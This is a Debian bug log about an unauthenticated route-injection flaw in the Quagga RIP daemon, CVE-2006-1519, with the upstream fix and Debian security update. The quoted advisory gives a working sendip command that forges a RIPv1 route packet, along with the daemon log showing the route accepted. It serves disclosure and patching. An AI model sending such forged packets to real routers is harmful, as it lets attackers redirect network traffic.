SECURITY: Quagga RIPD unauthenticated route injection

grave

[Message part 1 (text/plain, inline)]
Package: quagga
Severity: grave
Justification: user security hole
Tags: security

Affected:
 0.98.3: most probably; DSA for Sarge needed; patch in preparation
 0.99.x: yes, upload to unstable in preparation

In short:
 Attacked can inject routes to a Quagga router that talks RIPv1 even
 if RIPv2 authentication has been enabled.

bye,

-christian-

[Message part 2 (message/rfc822, inline)]
ocalhost [127.0.0.1])
	by allevil.dishone.st (8.12.11.20060308/8.12.8) with ESMTP id k43FXjs70109=
49;
	Wed, 3 May 2006 16:41:30 +0100
Received: from relayfix.tiscali.de (relayfix.tiscali.de [62.27.33.188])
	by allevil.dishone.st (8.12.11.20060308/8.12.8) with ESMTP id
	k43FXgjr010934
	for <quagga-users@lists.quagga.net>; Wed, 3 May 2006 16:33:43 +0100
Received: from mervisoft.de (p54A9D72F.dip.t-dialin.net [84.169.215.47])
	by relayfix.tiscali.de (Postfix) with ESMTP
	id 888025057B1; Wed,  3 May 2006 17:00:12 +0200 (CEST)
Received: from mail pickup service by mervisoft.de with Microsoft SMTPSVC;
	Wed, 3 May 2006 17:01:16 +0200
thread-index: AcZuwm0dH/tqKPyMQA2QVffnsLZwRA=3D=3D
Delivered-To: info@mervisoft.de
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
Message-ID: <000a01c66ec2$6d1fcff0$8bc8a8c0@MervisoftWBN.local>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
X-Mailer: Microsoft CDO for Exchange 2000
Date: Wed, 3 May 2006 17:01:16 +0200
From: "Paul Jakma" <paul@clubi.ie>
X-X-Sender: paul@sheen.jakma.org
To: <kbo@allevil.dishone.st>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2663
In-Reply-To: <44580900.8090700@arhont.com>
References: <44580900.8090700@arhont.com>
Content-Class: urn:content-classes:message
Mail-Copies-To: paul@hibernia.jakma.org
Importance: normal
Priority: normal
Mail-Followup-To: paul@hibernia.jakma.org
X-NSA: al aqsar fluffy jihad cute musharef kittens jet-A1 ear avgas wax
	ammonium bad qran dog inshallah allah al-akbar martyr iraq
	hammas hisballah rabin ayatollah korea revolt pelvix mustard
	gas x-ray british airways washington peroxide cool
X-OriginalArrivalTime: 03 May 2006 15:01:16.0078 (UTC)
	FILETIME=3D[6D296CE0:01C66EC2]
X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.6 (alle=
vil.dishone.st [127.0.0.1]); Wed, 03 May 2006 16:54:29 +0100 (IST)
X-Greylist: Delayed for 00:33:22 by milter-greylist-1.6 (allevil.dishone.st
	[64.39.15.246]); Wed, 03 May 2006 16:33:44 +0100 (IST)
X-Virus-Scanned: ClamAV 0.80/674/Tue Jan 18 20:27:28 2005
	clamav-milter version 0.80j
	on 127.0.0.1
X-Virus-Scanned: ClamAV 0.80/674/Tue Jan 18 20:27:28 2005
	clamav-milter version 0.80j on 127.0.0.1
X-Virus-Status: Clean
X-Virus-Status: Clean
Cc: maintainers@quagga.net,
	Quagga Users <quagga-users@lists.quagga.net>,
	full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: [quagga-users 6838] Re: Quagga RIPD unauthenticated route injection
X-BeenThere: quagga-users@lists.quagga.net
X-Mailman-Version: 2.1.2
List-Id: Quagga Users Lists  <quagga-users.lists.quagga.net>
List-Unsubscribe: <http://lists.quagga.net/mailman/listinfo/quagga-users>,
	<mailto:quagga-users-request@lists.quagga.net?subject=3Dunsubscribe>
List-Archive: <http://lists.quagga.net/pipermail/quagga-users>
List-Post: <mailto:quagga-users@lists.quagga.net>
List-Help: <mailto:quagga-users-request@lists.quagga.net?subject=3Dhelp>
List-Subscribe: <http://lists.quagga.net/mailman/listinfo/quagga-users>,
	<mailto:quagga-users-request@lists.quagga.net?subject=3Dsubscribe>
Sender: quagga-users-bounces@lists.quagga.net
Errors-To: quagga-users-bounces@lists.quagga.net
X-Spam-Status: No, hits=3D-2.5 tagged_above=3D-999.0 required=3D5.0
	tests=3DFORGED_RCVD_HELO, WESTEND_MAILMAN_LIST
X-Spam-Level:=20
Mime-Version: 1.0
Content-Type: text/PLAIN; charset=3DUS-ASCII; format=3Dflowed
Content-Transfer-Encoding: binary

Hi Konstantin,

Thanks for these reports. Quagga bug #262 has been opened for the=20
issue below, see:

 	http://bugzilla.quagga.net/show_bug.cgi?id=3D262

The former report is assigned as Quagga bug #261:

 	http://bugzilla.quagga.net/show_bug.cgi?id=3D261

Comments are there regarding the scope of the information leak (the=20
reply is unicasted with default TTL).

Bug #262 has proposed patches attached to solve both issues.

It does not restrict the scope of unicasted RIPv1 replies. It is=20
suggested that users either disallow RIPv1 entirely or firewall RIP=20
at network boundaries if RIPv1 must be used.

Thanks very much for your reports and assistance.

--paulj

On Wed, 3 May 2006, Konstantin V. Gavrilenko wrote:

> Arhont Ltd - Information Security
>
> Advisory by:	Konstantin V. Gavrilenko (http://www.arhont.com)
> Arhont ref:	arh400604-2
> Advisory:	Quagga RIPD unauthenticated route injection
> Class:		design bug?
> Version:	Tested on Quagga suite v0.98.5 v0.99.3 (Gentoo, 2.6.15)
> Model Specific:	Other versions might have the same bug
>
>
> DETAILS
> It is possible to inject a custom malicious route into the quagga RIP
> daemon using the RIPv1 RESPONSE packet even if the quagga has been
> configured to use MD5 authentication.
>
> The prerequisite to the attack is the absence of the specific version of
> the protocol in the router rip configuration. This way, quagga accepts
> authenticated RIPv2 and also RIPv1 packets, that do not have
> authentication mechanism at all.
>
> configuration of the ripd
> key chain dmz
> key 1
>  key-string secret
> !
> interface eth0
> ip rip authentication mode md5 auth-length old-ripd
> ip rip authentication key-chain dmz
> !
> router rip
> redistribute static
> network eth0
>
> arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p
> rip -rv 1 -rc 2  -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.=
100
>
> RIPD LOG
> 2006/05/02 16:06:45 RIP: RECV packet from 192.168.69.102 port 520 on eth0
> 2006/05/02 16:06:45 RIP: RECV RESPONSE version 1 packet size 24
> 2006/05/02 16:06:45 RIP:   192.168.36.0 family 2 tag 0 metric 1
> 2006/05/02 16:06:45 RIP: Resultant route 192.168.36.0
> 2006/05/02 16:06:45 RIP: Resultant mask 255.255.255.0
> 2006/05/02 16:06:45 RIP: triggered update!
>
>
> RISK FACTOR: Medium
>
>
> WORKAROUNDS: Implement the patch for the ripd or firewall the access to
> the ripd daemon on the need to access basis.
>
>
> COMMUNICATION HISTORY:
> Issue discovered:	  10/04/2006
> quagga notified:	  24/04/2006
> Public disclosure:	  03/05/2006
>
> ADDITIONAL INFORMATION:
> *According to the Arhont Ltd. policy, all of the found vulnerabilities
> and security issues will be reported to the manufacturer at least 7 days
> before releasing them to the public domains (such as CERT and BUGTRAQ).
>
> If you would like to get more information about this issue, please do
> not hesitate to contact Arhont team on info@arhont.com
>
>
>

--=20
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
Fortune:
Real Users are afraid they'll break the machine -- but they're never
afraid to break your face.

_______________________________________________
Quagga-users mailing list
Quagga-users@lists.quagga.net
http://lists.quagga.net/mailman/listinfo/quagga-users

Notes from the upstream author. Maybe we should wait a day or two with
the DSA as it could break something with the current patch.

bye,

-christian-

On 2006-05-03 Paul Jakma wrote:
> On Wed, 3 May 2006, Christian Hammers wrote:
> 
> > Can I use the second version of the patch to prepare the Debian 
> > security updates or should I rather wait until you have a cleaner 
> > patch?
> 
> The patch itself is clean, however it changes the default 
> authentication type - which isn't the best thing to do for 0.98. I 
> need to change it to leave the default alone so it can be releasable.
> 
> > Apropos, the patch cleanly applies to version 0.98.3 which was the 
> > one shipped with the last Debian release. Can I safely use it and 
> > does it fix the problem in 0.98.3, too?
> 
> Yes. But see above.

[Message part 1 (text/plain, inline)]
Hello

Attached you will find a diff that can be used to make a DSA for the
recent Quagga security bug.

The diff contains four files in debian/patches/CVE* that the upstream
author recommended me in
 http://lists.quagga.net/pipermail/quagga-users/2006-May/006845.html
to use for version 0.98.3 as well as the result of applying them:
 $ interdiff -z quagga_0.98.3-7.diff.gz quagga_0.98.3-7.1.diff.gz | diffstat
 debian/patches/CVE-2006-1519_part1.diff |  338 ++++++++++++++++++++++++++++++++
 debian/patches/CVE-2006-1519_part2.diff |  182 +++++++++++++++++
 debian/patches/CVE-2006-1519_part3.diff |   70 ++++++
 debian/patches/CVE-2006-1519_part4.diff |   64 ++++++
 doc/ripd.texi                           |  126 ++++++++---
 quagga-0.98.3/debian/changelog          |    9 
 ripd/rip_interface.c                    |   37 ++-
 ripd/ripd.c                             |  205 +++++++++----------
 8 files changed, 885 insertions(+), 146 deletions(-)

The proposed DSA text (with text stolen from CVE) is:

 DSA-XXXX-1 quagga -- ripd unauthenticated route injection

 Date Reported:
    03 May 2006
 Affected Packages:
    quagga 
 Vulnerable:
    Yes
 Security database references:
    In the Bugtraq database (at SecurityFocus): BugTraq ID 17808.
    In Mitre's CVE dictionary: CVE-2006-1519.
 More information:
    Konstantin V. Gavrilenko discovered that Quagga is susceptible to
    remote information-disclosure and route-injection vulnerabilities.
    The application fails to properly ensure that required authentication
    and protocol configuration options are enforced.

    These issues allow remote attackers to gain access to potentially
    sensitive network-routing configuration information and to inject
    arbitrary routes into the RIP routing table. This may aid malicious
    users in further attacks against targeted networks.

    The old stable distribution (woody) does not contain quagga packages.

    For the stable distribution (sarge) this problem has been fixed in version 0.98.3-7.1.

    For the unstable distribution (sid) this problem has been fixed in version 0.99.3-2.

    We recommend that you upgrade your quagga package.

bye,

-christian-

[quagga_0.98.3-7.1.diff.gz (application/octet-stream, attachment)]
[signature.asc (application/pgp-signature, inline)]
Source: quagga
Source-Version: 0.99.3-2

We believe that the bug you reported is fixed in the latest version of
quagga, which is due to be installed in the Debian FTP archive:

quagga-doc_0.99.3-2_all.deb
  to pool/main/q/quagga/quagga-doc_0.99.3-2_all.deb
quagga_0.99.3-2.diff.gz
  to pool/main/q/quagga/quagga_0.99.3-2.diff.gz
quagga_0.99.3-2.dsc
  to pool/main/q/quagga/quagga_0.99.3-2.dsc
quagga_0.99.3-2_amd64.deb
  to pool/main/q/quagga/quagga_0.99.3-2_amd64.deb

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 365940@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christian Hammers <ch@debian.org> (supplier of updated quagga package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu,  4 May 2006 00:22:09 +0200
Source: quagga
Binary: quagga quagga-doc
Architecture: source amd64 all
Version: 0.99.3-2
Distribution: unstable
Urgency: high
Maintainer: Christian Hammers <ch@debian.org>
Changed-By: Christian Hammers <ch@debian.org>
Description: 
 quagga     - unoff. successor of the Zebra BGP/OSPF/RIP routing daemon
 quagga-doc - documentation files for quagga
Closes: 365940
Changes: 
 quagga (0.99.3-2) unstable; urgency=high
 .
   * SECURITY:
     Added security bugfix patch from upstream BTS for security problem
     that could lead to injected routes when using RIPv1.
     Closes: #365940
   * First amd64 upload.
Files: 
 59a0a5ae7c1991f36b3eaa34b916d70b 752 net optional quagga_0.99.3-2.dsc
 d05c0eba30402621c144bf1a363a59b0 29322 net optional quagga_0.99.3-2.diff.gz
 629b02d4563db0708da09e4f1412f265 663124 net optional quagga-doc_0.99.3-2_all.deb
 d3049348b80e0ad813c55eb457b3673b 1406676 net optional quagga_0.99.3-2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iEYEARECAAYFAkRaS+MACgkQkR9K5oahGOafwACePQL0qM4/a/vXJRbIwiogZB2W
+hkAnRtBJnZtFyESMNqIrdZE0IHFX6Fi
=OwCG
-----END PGP SIGNATURE-----

* Christian Hammers:

> Attached you will find a diff that can be used to make a DSA for the
> recent Quagga security bug.

Your proposal does not mention the behavior change which was alluded
to by upstream.  Is this intentional?

Hello Florian

On 2006-05-05 Florian Weimer wrote:
> * Christian Hammers:
> 
> > Attached you will find a diff that can be used to make a DSA for the
> > recent Quagga security bug.
> 
> Your proposal does not mention the behavior change which was alluded
> to by upstream.  Is this intentional?

Paul mentioned a behavior change in his mail from Wed May 3 23:57h
saying that this was no realeasable state and then replied to this
mail on Thu May 4 17:19h announcing the changeset for a 0.98 RC version.
I understood it as if he had fixed this flaw in the meantime.

But it's probably really better to check so I will ask him.

bye,

-christian-

Hello Paul

On 2006-05-04 Paul Jakma wrote:
> Hi Christian,
> 
> On Wed, 3 May 2006, Paul Jakma wrote:
> 
> > The patch itself is clean, however it changes the default 
> > authentication type - which isn't the best thing to do for 0.98. I 
> > need to change it to leave the default alone so it can be 
> > releasable.
> 
> See CVS for what is now 0.98.6-RC[1]. If you want just the ripd 
> specific changes for 0.98, for just an 0.98.5 update, see:

Just to be sure, "RC" means that the patch is now in a releasable
state and does no longer change the default behaviour?
Or if it does, could it cause any trouble?

bye,

-christian-

Hi Christian,

On Fri, 5 May 2006, Christian Hammers wrote:

> Just to be sure, "RC" means that the patch is now in a releasable 
> state

Yes. The 0.98 CVS branch is now in the "this is what we intend to 
release as 0.98.6" state.

> and does no longer change the default behaviour?

The defaults are unchanged.

The difference in 0.98 now is that the 'no ip rip authentication 
mode' will actually set "no authentication". It will write out such 
as well, that should allow everything to remain compatible, and also 
allow any 0.98 users to upgrade to 0.99 in a compatible manner 
(provided they 'write file' in 0.98.6+ before going to 0.99, or at 
least, take heed of either the output of 'show running-config' or the 
updated documentation - the section on "RIP Authentication").

> Or if it does, could it cause any trouble?

Wrt ripd:

upgrading from <= 0.98.5 to >= 0.98.6 shouldn't be any trouble - as 
the defaults remain the same.

upgrading from >= 0.98.6 to 0.99+ should be ok too, except that any 
users who relied on simple-auth being the default will need to have 
either:

- done a 'write file' in >=0.98.6 any time before upgrading
- or taken heed of the documentation in 0.98.6 and manually updated
  their ripd.conf
- or noticed that 0.98.6+ 'show running-config' output has changed,
  and explicitely outputs 'ip rip authentication mode text', and
  hence taken that as their cue to update their ripd.conf

ie for users who don't use 'write file' to maintain their ripd.conf, 
there are two 'cues' that things have changed - the docs and 'show 
running-config'. If they take heed of those cues, then they wont have 
problems upgrading later to 0.99+.

RIPv2 MD5 authentication users would be fine (and hopefully anyone 
using RIPv2 authentication is using MD5) - nothing changes there.

Make sense? :)

regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
Fortune:
Beware of geeks bearing graft.

Christian Hammers wrote:
> Attached you will find a diff that can be used to make a DSA for the
> recent Quagga security bug.

Thanks a lot for preparing the update.

Please also mention CVE-2006-2223 CVE-2006-2224 in the unstable changelog
when you're doing the next upload anyway.

Regards,

	Joey

-- 
Linux - the choice of a GNU generation.

Please always Cc to me when replying to me on the lists.

On 2006-05-13 Martin Schulze wrote:
> Christian Hammers wrote:
> > Attached you will find a diff that can be used to make a DSA for the
> > recent Quagga security bug.
> 
> Thanks a lot for preparing the update.
> 
> Please also mention CVE-2006-2223 CVE-2006-2224 in the unstable changelog
> when you're doing the next upload anyway.

Please wait a day or two with the Quagga DSA, there has been one further
security problem reported yesterday in Bug 366980

 CVE-2006-2276:
 bgpd in Quagga 0.98 and 0.99 before 20060504 allows local users to
 cause a denial of service (CPU consumption) via a certain sh ip bgp
 command entered in the telnet interface.

 See
 http://www.quagga.net/news2.php?y=2006&m=5&d=4#id1146764580

I prepare unstable now and stable today or tomorrow...

bye,

-christian-

SECURITY: Quagga RIPD unauthenticated route injection

Debian Bug report logs - #365940
SECURITY: Quagga RIPD unauthenticated route injection

Vulmon Search

About

Products

Connect

SECURITY: Quagga RIPD unauthenticated route injection

Debian Bug report logs - #365940 SECURITY: Quagga RIPD unauthenticated route injection

Vulmon Search

About

Products

Connect

Debian Bug report logs - #365940
SECURITY: Quagga RIPD unauthenticated route injection